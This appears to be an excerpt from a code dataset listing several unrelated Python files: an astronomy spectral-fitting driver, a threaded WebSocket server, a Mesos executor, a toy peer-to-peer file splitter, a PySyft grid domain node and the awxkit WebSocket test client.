'High resolution is a fit for every pixel, medium pixels are 3x3, low pixels are 5x5.')
parser.add_argument("--dev-mtpc", dest='dev_mtpc', type=int, action="store",
default=0, help="Max Task Per Child sent to mp.Pool()")
args = parser.parse_args()
return args
def print_stage_tmap_prep(cluster: cluster.ClusterObj):
prep_str = """Now ready for spectral fitting.
If offloaded, copy the spectral fits file, {spectral_fits},
back to the local machine.
Next, run
python acb.py --temperature_map --resolution 2 --cluster_config_file /path/to/cluster/A115/A115_pypeline_config.ini
This will create the temperature map and allow for the creation of the pressure maps.""".format(
spectral_fits=cluster.spec_fits_file
)
print(prep_str)
def print_iteration_string(start_time, iteration, total):
try:
elapsed = time.time() - start_time
time_elapsed_str = time.strftime("%H hours %M minutes %S seconds",
time.gmtime(elapsed))
time_per_iteration = elapsed/iteration
time_per_iteration_str = time.strftime("%H hours %M minutes %S seconds",
time.gmtime(time_per_iteration))
time_remaining = time_per_iteration * (total-iteration)
time_remaining_str = time.strftime("%H hours %M minutes %S seconds",
time.gmtime(time_remaining))
io.print_red("\n*********************************\n")
io.print_red("Iteration {} of {}".format(i + 1, num_region_lists))
io.print_red("Time elapsed: {elapsed}".format(elapsed=time_elapsed_str))
io.print_red("Approximate time per iteration: {}".format(time_per_iteration_str))
io.print_red("Approximate time remaining: {}".format(time_remaining_str))
io.print_red("\n*********************************\n")
except ZeroDivisionError:
io.print_red("\n*********************************\n")
io.print_red("Iteration {} of {}".format(i + 1, num_region_lists))
io.print_red("\n*********************************\n")
if __name__ == '__main__':
args = get_arguments()
if args.cluster_config is not None:
clstr = cluster.read_cluster_data(args.cluster_config)
if args.cont:
print("Continuing spectral fits")
regions = clstr.unfinished_regions_to_fit(args.resolution)
original = len(clstr.scale_map_regions_to_fit(args.resolution))
print('{reg} of {orig} regions left to fit.'.format(
reg=len(regions),
orig=original)
)
else:
clstr.initialize_best_fits_file()
clstr.initialize_worst_fits_file()
clstr.initialize_all_fits_file()
regions = clstr.scale_map_regions_to_fit(args.resolution)
print("Regions to fit: {reg}".format(reg=len(regions)))
start_time = time.time()
num_regions = len(regions)
if args.parallel:
num_region_lists = (num_regions//args.num_cpus)+1
region_lists = np.array_split(regions, num_region_lists)
print("Starting {} iterations with ~{} fits per iteration.".format(len(region_lists), len(region_lists[0])))
for i, small_region_list in enumerate(region_lists):
print_iteration_string(start_time, i, num_region_lists)
processes = [mp.Process(target=clstr.fit_region_number, args=(region,)) for region in small_region_list]
for process in processes:
process.start()
for process in processes:
process.join()
else:
num_regions = len(regions)
counter = 0
for region in regions:
print("Running pix2pix on region {region}".format(region=region))
clstr.fit_region_number(region)
counter += 1
if counter % 10 == 0 or counter == num_regions:
print("{} of {} regions complete".format(counter, num_regions))
time_elapsed = time.strftime("%H hours %M minutes %S seconds.",
time.gmtime(time.time() - start_time))
print("Time elapsed: {}.".format(time_elapsed))
print_stage_tmap_prep(clstr)
|
web_socket_server.py | # -*- coding: utf-8 -*-
import socket
import ssl
from queue import Queue
from threading import Thread
from web_socket import WebSocket
class WebSocketServer:
server_socket = None
threads = []
exit_scheduled = False
queue = Queue()
def __init__(self, listen_ip, port, ping_interval_seconds=20, ping_pong_keep_alive_interval=3, debug=False,
cert_file=None, key_file=None):
self.server_socket = socket.socket()
if cert_file and key_file:
self.server_socket = ssl.wrap_socket(self.server_socket,
server_side=True,
certfile=cert_file,
keyfile=key_file,
ssl_version=ssl.PROTOCOL_SSLv23)
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server_socket.bind((listen_ip, port))
self.ping_interval_seconds = ping_interval_seconds
self.ping_pong_keep_alive_interval = ping_pong_keep_alive_interval
self.debug = debug
def listen(self):
"""
Listens for connections until exit_scheduled is true. Connections are added to the queue on connect.
"""
self.server_socket.setblocking(0)
self.server_socket.listen()
while not self.exit_scheduled:
try:
conn, address = self.server_socket.accept()
if self.debug:
print('Connection attempt received at ' + address[0])
self.queue.put(WebSocket(conn, ping_interval_seconds=self.ping_interval_seconds,
ping_pong_keep_alive_interval=self.ping_pong_keep_alive_interval,
debug=self.debug))
except socket.error:
pass # no connection yet
def worker(self, func):
"""
Function that loops and calls single_action until exit_scheduled is true.
:param func: Function to be called on message and connection when data is received.
"""
while not self.exit_scheduled:
self.single_action(func)
def single_action(self, func):
"""
Listens to a socket, does nothing if no data is received. Calls the given function on the message and socket
if data was received.
:param func: The function to be called with the message and socket.
"""
c = self.queue.get()
try:
msg = c.recv()
if msg:
func(msg, c)
except socket.error:
# no data received yet
pass
if c.is_alive:
self.queue.put(c)
def start(self, func, worker_thread_count=5):
"""
Starts the server
:param func: The function to be called when a message is received. This function takes a msg object, which is
the decoded payload of the bytes received, and a connection-object, which is the socket that received the
message. This function calls the listen-method
:param worker_thread_count: Number of threads to use as worker-threads.
"""
Thread(target=self.listen).start()
if self.debug:
print('Starting connection handlers')
for i in range(worker_thread_count):
t = Thread(target=self.worker, args=(func,))
t.start()
def stop(self):
"""
Stops the server by telling the workers to stop, and waiting for them to do so.
"""
self.exit_scheduled = True
if self.debug:
print('Stopping server...')
for t in self.threads:
t.join()
|
__init__.py | import sys
import threading
import json
import traceback
from importlib import import_module
import mesos.interface
from mesos.interface import mesos_pb2
from pyrallelsa import group_runner
from pyrallelsa import ProblemClassPath
from enrique.package import get_package
class Enrique(mesos.interface.Executor):
def registered(self, driver, executorInfo, frameworkInfo, slaveInfo):
print "Executor registered"
def disconnected(self, driver):
print "Executor disconnected"
def launchTask(self, driver, task):
# Create a thread to run the task. Tasks should always be run in new
# threads or processes, rather than inside launchTask itself.
def run_task():
try:
print "Running task %s" % task.task_id.value
update = mesos_pb2.TaskStatus()
update.task_id.value = task.task_id.value
update.state = mesos_pb2.TASK_RUNNING
update.data = 'task running'
driver.sendStatusUpdate(update)
print task.data
task_data = json.loads(task.data)
uid = task_data['uid']
problem_name = task_data['name']
task_command = task_data['command']
problem_data = task_data['problem_data']
problem_data_str = json.dumps(problem_data)
package = get_package(problem_name)
sys.path.append(package.problem_path)
pccls_module = import_module("problem")
PCCls = getattr(pccls_module, "Problem")
pcp = ProblemClassPath("problem", "Problem")
if task_command == 'divisions':
task_divisions = task_data['divisions']
res = list(PCCls.divide(
divisions=task_divisions,
problem_data=problem_data
))
res_data = {
"divisions": res
}
elif task_command == 'anneal':
minutes_per_division = task_data['minutes_per_division']
sstates = task_data['sstates']
solutions = group_runner((
uid, pcp, sstates,
minutes_per_division,
problem_data_str, None))
winner = sorted(
(solution for solution in solutions),
key=lambda s: s.energy
)[0]
res_data = {
"best_location": winner.state,
"fitness_score": winner.energy
}
else:
raise ValueError("Invalid task_command {}"
.format(task_command))
update = mesos_pb2.TaskStatus()
update.task_id.value = task.task_id.value
update.state = mesos_pb2.TASK_FINISHED
res_dict = dict(uid=uid)
res_dict.update(res_data)
update.data = json.dumps(res_dict)
driver.sendStatusUpdate(update)
except:
stacktrace = "".join(
traceback.format_exception(*sys.exc_info())
)
sys.stderr.write(stacktrace+'\n')
update = mesos_pb2.TaskStatus()
update.task_id.value = task.task_id.value
update.state = mesos_pb2.TASK_FAILED
res_dict = {"error": stacktrace}
update.data = json.dumps(res_dict)
driver.sendStatusUpdate(update)
thread = threading.Thread(target=run_task)
thread.start()
def killTask(self, driver, taskId):
update = mesos_pb2.TaskStatus()
update.task_id.value = taskId.value
update.state = mesos_pb2.TASK_KILLED
res_dict = {"message": "Killed on request from the scheduler"}
update.data = json.dumps(res_dict)
# Send update, then die
driver.sendStatusUpdate(update)
raise SystemExit(res_dict['message'])
def frameworkMessage(self, driver, message):
# Send it back to the scheduler.
driver.sendFrameworkMessage(message)
def main():
import mesos.native
print "Starting executor"
driver = mesos.native.MesosExecutorDriver(Enrique())
sys.exit(0 if driver.run() == mesos_pb2.DRIVER_STOPPED else 1)
|
main.py | from crypto import *
import threading
import socket
import struct
import time
import json
import uuid
import ast
import sys
import os
class Peer(threading.Thread):
def __init__(self, host, port, dataDir='storage', maxpeers=100, maxfilesize=10*(10**10), maxnumfiles=200):
super(Peer,self).__init__()
self.host = host
self.port = int(port)
self.maxpeers = int(maxpeers)
self.dataDir = dataDir if dataDir.endswith('/') else dataDir+'/'
if not os.path.exists(self.dataDir):
os.makedirs(self.dataDir)
self.socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind((self.host, self.port))
self.socket.listen(self.maxpeers)
self.peers = []
self._lock = threading.Lock()
self.files = self.getfilelist()[1]
self.maxfilesize = maxfilesize
self.numfiles = len(self.files)
self._shutdown = False
self.sent_split_files = {}
def split_send_file(self,path):
peers = self.get_active_peers()
plen = len(peers)
size = os.path.getsize(path)
chunk = int(size/plen)
cmd = "{'type':'FILEUP'}"
cmdlen = len(cmd)
addMod = size % plen
x = True
d = {}
with open(path,'rb') as f:
for i in peers:
c = self.create_client_sock()
c.connect(i)
c.send(struct.pack('!L',cmdlen))
c.send(struct.pack('!{}s'.format(cmdlen), cmd.encode()))
if x:
b=xor(f.read(chunk+addMod))
d[hash(b)]=i
c.send(struct.pack('!L', chunk+addMod))
c.send(b)
c.close()
x = False
else:
b=xor(f.read(chunk+addMod))
d[hash(b)]=i
c.send(struct.pack('!L', chunk))
c.send(b)
c.close()
self.sent_split_files[file_hash(path)] = d
def create_client_sock(self):
clientsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
clientsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return clientsock
def get_active_peers(self):
query = "{'type':'PING'}"
l = len(query)
tmp = []
for i in self.peers:
d=self.sendtopeer(i,query)
if struct.unpack('!4s',d)[0].decode() == 'PONG':
tmp.append(i)
return tmp
def getfilelist(self):
f = os.listdir(self.dataDir)
d = {}
for i in f:
d[file_hash(self.dataDir+i)] = i
return len(str(d)),d
def recv_split_file(self,h,path):
peers = self.sent_split_files[h]
with open(path,'wb') as f:
for i in peers:
f.write(xor(self.dl_file(peers[i],i,save=False)))
def sendtopeer(self,peer,msg,wait=True):
m = struct.pack('!L',len(msg))
data = struct.pack('!{}s'.format(len(msg)),msg.encode())
c = self.create_client_sock()
c.connect(peer)
c.send(m)
c.send(data)
if wait:
d=struct.unpack('!L',c.recv(4))[0]
data = c.recv(d)
c.close()
return data
c.close()
def _sendlen(self,c,m):
c.send(struct.pack('!L',len(m)))
def randstr(self):
return str(uuid.uuid4()).split('-')[0]
def _peermsg(self,d,c):
mtype = d['type']
if mtype == 'PING':
self._sendlen(c,'PONG')
c.send(struct.pack('!4s','PONG'.encode()))
c.close()
elif mtype == 'PEERLIST':
m = str(self.peers)
self._sendlen(c,m)
l = len(m)
c.send(struct.pack('!{}s'.format(l),m.encode()))
c.close()
elif mtype == 'FILEUP':
size = struct.unpack('!L',c.recv(4))[0]
with open(self.dataDir+self.randstr(),'wb') as f:
f.write(c.recv(size))
c.close()
elif mtype == 'FILES':
l,m = self.getfilelist()
self._sendlen(c,str(m))
c.send(struct.pack('!{}s'.format(l),str(m).encode()))
c.close()
elif mtype == 'GET':
fname = d['hash']
self.files=self.getfilelist()[1]
if fname in self.files:
path = self.dataDir+self.files[fname]
size = os.path.getsize(path)
c.send(struct.pack('!L',size))
with open(path,'rb') as f:
b = f.read(size)
c.send(b)
c.close()
else:
self._sendlen(c,'NOTFOUND')
c.send(struct.pack('!{}s'.format(len('NOTFOUND')), 'NOTFOUND'.encode()))
c.close()
else:
c.close()
def _handle(self, conn):
msglen = struct.unpack('!L',conn.recv(4))[0]
if not msglen: return -1
msg = conn.recv(msglen)
data = struct.unpack('!{}s'.format(msglen),msg)[0].decode()
self._peermsg(ast.literal_eval(data),conn)
def mainloop(self):
try:
while not self._shutdown:
conn, addr = self.socket.accept()
print('[*] New connection from ' + str(addr))
#self.peers.append(conn.getpeername())
t = threading.Thread(target=self._handle, args=(conn,))
t.start()
except KeyboardInterrupt:
self.socket.close()
sys.exit(1)
def updatePeers(self,n):
self._lock.acquire()
for i in n:
if i not in self.peers:
self.peers.append(i)
self._lock.release()
def request_file(self,filehash,name):
self.files = self.getfilelist()
if filehash in self.files:
return
req = str({'type': 'GET', 'hash':filehash})
m = struct.pack('!L',len(req))
data = struct.pack('!{}s'.format(len(req)),req)
l = len('NOTFOUND')
for i in self.peers:
c = self.create_client_sock()
c.connect(i)
c.send(m)
c.send(data)
d=struct.unpack('!L',c.recv(4))[0]
if d == l:
c.close()
continue
self.dl_file(i,filehash,name=name)
break
def dl_file(self,peer,filehash,name='',save=True):
req = str({'type': 'GET', 'hash':filehash})
m = struct.pack('!L',len(req))
data = struct.pack('!{}s'.format(len(req)),req.encode())
c = self.create_client_sock()
c.connect(peer)
c.send(m)
c.send(data)
d=struct.unpack('!L',c.recv(4))[0]
if save:
with open(self.dataDir+name,'wb') as f:
f.write(c.recv(d))
c.close()
else:
return c.recv(d)
c.close()
def shutdown(self):
self._shutdown = True
def run(self):
self.mainloop()
if __name__ == '__main__':
try:
p = Peer('127.0.0.1',6000)
p.daemon = True
p.start()
p.peers=[('127.0.0.1',7000),('127.0.0.1',8000)]
k=input('(blockr) ')
while k != 'quit':
if k.startswith('upload'):
p.split_send_file(k.split(' ')[1])
elif k.startswith('retrieve'):
m = k.split(' ')
p.recv_split_file(m[1],m[2])
k = input('(blockr) ')
sys.exit()
while True: time.sleep(100)
except KeyboardInterrupt:
print('Exiting...')
sys.exit(1)
|
domain.py | # stdlib
from threading import Thread
from time import sleep
from typing import Dict
from typing import Optional
# third party
from flask import current_app as app
import jwt
from nacl.signing import SigningKey
from nacl.signing import VerifyKey
import syft as sy
from syft import serialize
from syft.core.common.message import SignedImmediateSyftMessageWithReply
from syft.core.common.message import SignedImmediateSyftMessageWithoutReply
from syft.core.io.location import Location
from syft.core.io.location import SpecificLocation
from syft.core.node.common.action.exception_action import ExceptionMessage
from syft.core.node.common.action.exception_action import UnknownPrivateException
from syft.core.node.common.service.auth import AuthorizationException
from syft.core.node.device.client import DeviceClient
from syft.core.node.domain.domain import Domain
from syft.grid.connections.http_connection import HTTPConnection
import tenseal as ts
# grid relative
from ..database import db
from ..database.store_disk import DiskObjectStore
from ..manager.association_request_manager import AssociationRequestManager
from ..manager.environment_manager import EnvironmentManager
from ..manager.group_manager import GroupManager
from ..manager.request_manager import RequestManager
from ..manager.role_manager import RoleManager
from ..manager.setup_manager import SetupManager
from ..manager.user_manager import UserManager
from ..services.association_request import AssociationRequestService
from ..services.dataset_service import DatasetManagerService
from ..services.group_service import GroupManagerService
from ..services.infra_service import DomainInfrastructureService
from ..services.request_service import RequestService
from ..services.role_service import RoleManagerService
from ..services.setup_service import SetUpService
from ..services.tensor_service import RegisterTensorService
from ..services.transfer_service import TransferObjectService
from ..services.user_service import UserManagerService
sy.load("tenseal")
class GridDomain(Domain):
def __init__(
self,
name: Optional[str],
network: Optional[Location] = None,
domain: SpecificLocation = SpecificLocation(),
device: Optional[Location] = None,
vm: Optional[Location] = None,
signing_key: Optional[SigningKey] = None,
verify_key: Optional[VerifyKey] = None,
root_key: Optional[VerifyKey] = None,
db_path: Optional[str] = None,
):
super().__init__(
name=name,
network=network,
domain=domain,
device=device,
vm=vm,
signing_key=signing_key,
verify_key=verify_key,
db_path=db_path,
)
# Database Management Instances
self.users = UserManager(db)
self.roles = RoleManager(db)
self.groups = GroupManager(db)
self.disk_store = DiskObjectStore(db)
self.environments = EnvironmentManager(db)
self.setup = SetupManager(db)
self.association_requests = AssociationRequestManager(db)
self.data_requests = RequestManager(db)
self.env_clients = {}
self.setup_configs = {}
# Grid Domain Services
self.immediate_services_with_reply.append(AssociationRequestService)
self.immediate_services_with_reply.append(DomainInfrastructureService)
self.immediate_services_with_reply.append(SetUpService)
self.immediate_services_with_reply.append(RegisterTensorService)
self.immediate_services_with_reply.append(RoleManagerService)
self.immediate_services_with_reply.append(UserManagerService)
self.immediate_services_with_reply.append(DatasetManagerService)
self.immediate_services_with_reply.append(GroupManagerService)
self.immediate_services_with_reply.append(TransferObjectService)
self.immediate_services_with_reply.append(RequestService)
self._register_services()
self.__handlers_flag = True
# thread = Thread(target=self.thread_run_handlers)
# thread.start()
def login(self, email: str, password: str) -> Dict:
user = self.users.login(email=email, password=password)
token = jwt.encode({"id": user.id}, app.config["SECRET_KEY"])
token = token.decode("UTF-8")
return {
"token": token,
"key": user.private_key,
"metadata": serialize(self.get_metadata_for_client())
.SerializeToString()
.decode("ISO-8859-1"),
}
def recv_immediate_msg_with_reply(
self, msg: SignedImmediateSyftMessageWithReply, raise_exception=False
) -> SignedImmediateSyftMessageWithoutReply:
if raise_exception:
response = self.process_message(
msg=msg, router=self.immediate_msg_with_reply_router
)
# maybe I shouldn't have created process_message because it screws up
# all the type inference.
res_msg = response.sign(signing_key=self.signing_key) # type: ignore
else:
# exceptions can be easily triggered which break any WebRTC loops
# so we need to catch them here and respond with a special exception
# message reply
try:
# try to process message
response = self.process_message(
msg=msg, router=self.immediate_msg_with_reply_router
)
except Exception as e:
public_exception: Exception
if isinstance(e, AuthorizationException):
private_log_msg = "An AuthorizationException has been triggered"
public_exception = e
else:
private_log_msg = f"An {type(e)} has been triggered" # dont send
public_exception = UnknownPrivateException(
"UnknownPrivateException has been triggered."
)
try:
# try printing a useful message
private_log_msg += f" by {type(msg.message)} "
private_log_msg += f"from {msg.message.reply_to}" # type: ignore
except Exception:
pass
# send the public exception back
response = ExceptionMessage(
address=msg.message.reply_to, # type: ignore
msg_id_causing_exception=msg.message.id,
exception_type=type(public_exception),
exception_msg=str(public_exception),
)
# maybe I shouldn't have created process_message because it screws up
# all the type inference.
res_msg = response.sign(signing_key=self.signing_key) # type: ignore
output = (
f"> {self.pprint} Signing {res_msg.pprint} with "
+ f"{self.key_emoji(key=self.signing_key.verify_key)}" # type: ignore
)
return res_msg
|
ws.py | import time
import threading
import logging
import atexit
import json
import ssl
from six.moves.queue import Queue, Empty
from six.moves.urllib.parse import urlparse
from awxkit.config import config
log = logging.getLogger(__name__)
class WSClientException(Exception):
pass
changed = 'changed'
limit_reached = 'limit_reached'
status_changed = 'status_changed'
summary = 'summary'
class WSClient(object):
"""Provides a basic means of testing pub/sub notifications with payloads similar to
'groups': {'jobs': ['status_changed', 'summary'],
'schedules': ['changed'],
'ad_hoc_command_events': [ids...],
'job_events': [ids...],
'workflow_events': [ids...],
'project_update_events': [ids...],
'inventory_update_events': [ids...],
'system_job_events': [ids...],
'control': ['limit_reached']}
e.x:
```
ws = WSClient(token, port=8013, secure=False).connect()
ws.job_details()
... # launch job
job_messages = [msg for msg in ws]
ws.ad_hoc_stdout()
... # launch ad hoc command
ad_hoc_messages = [msg for msg in ws]
ws.close()
```
"""
# Subscription group types
def __init__(self, token=None, hostname='', port=443, secure=True, session_id=None, csrftoken=None):
# delay this import, because this is an optional dependency
import websocket
if not hostname:
result = urlparse(config.base_url)
secure = result.scheme == 'https'
port = result.port
if port is None:
port = 80
if secure:
port = 443
# should we be adding result.path here?
hostname = result.hostname
self.port = port
self._use_ssl = secure
self.hostname = hostname
self.token = token
self.session_id = session_id
self.csrftoken = csrftoken
self._recv_queue = Queue()
self._ws_closed = False
self._ws_connected_flag = threading.Event()
if self.token is not None:
auth_cookie = 'token="{0.token}";'.format(self)
elif self.session_id is not None:
auth_cookie = 'sessionid="{0.session_id}"'.format(self)
if self.csrftoken:
auth_cookie += ';csrftoken={0.csrftoken}'.format(self)
else:
auth_cookie = ''
pref = 'wss://' if self._use_ssl else 'ws://'
url = '{0}{1.hostname}:{1.port}/websocket/'.format(pref, self)
self.ws = websocket.WebSocketApp(url,
on_open=self._on_open,
on_message=self._on_message,
on_error=self._on_error,
on_close=self._on_close,
cookie=auth_cookie)
self._message_cache = []
self._should_subscribe_to_pending_job = False
def connect(self):
wst = threading.Thread(target=self._ws_run_forever, args=(self.ws, {"cert_reqs": ssl.CERT_NONE}))
wst.daemon = True
wst.start()
atexit.register(self.close)
if not self._ws_connected_flag.wait(20):
raise WSClientException('Failed to establish channel connection w/ AWX.')
return self
def close(self):
log.info('close method was called, but ignoring')
if not self._ws_closed:
log.info('Closing websocket connection.')
self.ws.close()
def job_details(self, *job_ids):
"""subscribes to job status, summary, and, for the specified ids, job events"""
self.subscribe(jobs=[status_changed, summary], job_events=list(job_ids))
def pending_job_details(self):
"""subscribes to job status and summary, with responsive
job event subscription for an id provided by AWX
"""
self.subscribe_to_pending_events('job_events', [status_changed, summary])
def status_changes(self):
self.subscribe(jobs=[status_changed])
def job_stdout(self, *job_ids):
self.subscribe(jobs=[status_changed], job_events=list(job_ids))
def pending_job_stdout(self):
self.subscribe_to_pending_events('job_events')
# mirror page behavior
def ad_hoc_stdout(self, *ahc_ids):
self.subscribe(jobs=[status_changed], ad_hoc_command_events=list(ahc_ids))
def pending_ad_hoc_stdout(self):
self.subscribe_to_pending_events('ad_hoc_command_events')
def project_update_stdout(self, *project_update_ids):
self.subscribe(jobs=[status_changed], project_update_events=list(project_update_ids))
def pending_project_update_stdout(self):
self.subscribe_to_pending_events('project_update_events')
def inventory_update_stdout(self, *inventory_update_ids):
self.subscribe(jobs=[status_changed], inventory_update_events=list(inventory_update_ids))
def pending_inventory_update_stdout(self):
self.subscribe_to_pending_events('inventory_update_events')
def workflow_events(self, *wfjt_ids):
self.subscribe(jobs=[status_changed], workflow_events=list(wfjt_ids))
def pending_workflow_events(self):
self.subscribe_to_pending_events('workflow_events')
def system_job_events(self, *system_job_ids):
self.subscribe(jobs=[status_changed], system_job_events=list(system_job_ids))
def pending_system_job_events(self):
self.subscribe_to_pending_events('system_job_events')
def subscribe_to_pending_events(self, events, jobs=[status_changed]):
self._should_subscribe_to_pending_job = dict(jobs=jobs, events=events)
self.subscribe(jobs=jobs)
# mirror page behavior
def jobs_list(self):
self.subscribe(jobs=[status_changed, summary], schedules=[changed])
# mirror page behavior
def dashboard(self):
self.subscribe(jobs=[status_changed])
def subscribe(self, **groups):
"""Sends a subscription request for the specified channel groups.
```
ws.subscribe(jobs=[ws.status_changed, ws.summary],
job_events=[1,2,3])
```
"""
self._subscribe(groups=groups)
def _subscribe(self, **payload):
payload['xrftoken'] = self.csrftoken
self._send(json.dumps(payload))
def unsubscribe(self):
self._send(json.dumps(dict(groups={}, xrftoken=self.csrftoken)))
# it takes time for the unsubscribe event to be recieved and consumed and for
# messages to stop being put on the queue for daphne to send to us
time.sleep(5)
def _on_message(self, message):
message = json.loads(message)
log.debug('received message: {}'.format(message))
if all([message.get('group_name') == 'jobs',
message.get('status') == 'pending',
message.get('unified_job_id'),
self._should_subscribe_to_pending_job]):
if bool(message.get('project_id')) == (
self._should_subscribe_to_pending_job['events'] == 'project_update_events'):
self._update_subscription(message['unified_job_id'])
return self._recv_queue.put(message)
def _update_subscription(self, job_id):
subscription = dict(jobs=self._should_subscribe_to_pending_job['jobs'])
events = self._should_subscribe_to_pending_job['events']
subscription[events] = [job_id]
self.subscribe(**subscription)
self._should_subscribe_to_pending_job = False
def _on_open(self):
self._ws_connected_flag.set()
def _on_error(self, error):
log.info('Error received: {}'.format(error))
def _on_close(self):
log.info('Successfully closed ws.')
self._ws_closed = True
def _ws_run_forever(self, sockopt=None, sslopt=None):
self.ws.run_forever(sslopt=sslopt)
log.debug('ws.run_forever finished')
def _recv(self, wait=False, timeout=10):
try:
msg = self._recv_queue.get(wait, timeout)
except Empty:
return None
return msg
def _send(self, data):
self.ws.send(data)
log.debug('successfully sent {}'.format(data))
def __iter__(self):
while True:
val = self._recv()
if not val:
return
yield val
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.